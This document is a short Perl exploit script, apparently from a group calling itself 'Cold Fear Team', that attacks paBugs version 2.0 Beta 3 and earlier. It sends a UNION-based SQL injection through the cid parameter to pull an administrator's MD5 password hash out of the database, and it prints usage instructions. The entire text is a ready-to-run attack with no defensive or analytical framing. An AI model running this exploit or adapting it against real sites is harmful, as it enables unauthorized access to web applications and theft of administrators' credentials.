Code: #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; if(@ARGV < 4) { usage(); exit(); } $host = $ARGV[0]; # Host $path = $ARGV[1]; # Path to paBugs directory $pref = $ARGV[2]; # prefix for table admins $usid = $ARGV[3]; # user id $www = new LWP::UserAgent; $sql = "$host$path\index.php?cid=1'+union+select+1,2,3,password,5+from+$pref\_admins+where+id=$usid/*"; print "\n\n [~] Searching password hash for user with id=$usid \n"; $res = $www -> get($sql) or err(); $res -> content() =~ /([0-9,a-f]{32})/ or err(); print "\n [+] MD5 Hash for user with id=$usid is: $1 \n\n"; sub usage() { print "+---------------------------------------------------------+\n"; print "| .: Cold Fear Team :. |\n"; print "+---------------------------------------------------------+\n"; print "| paBugs <= v2.0 Beta 3 Sql-Injection exploit |\n"; print "| Usage: pabugs_cft.pl <site> <folder> <prefix> <user_id> |\n"; print "| e.g.: pabugs_cft.pl http://site.com / bt 1 |\n"; print "| Coded by p-range // cf-team.net // p-range.info |\n"; print "+---------------------------------------------------------+\n"; } sub err() { print "\n [-] Engine is NOT vulnerably"; exit(); }
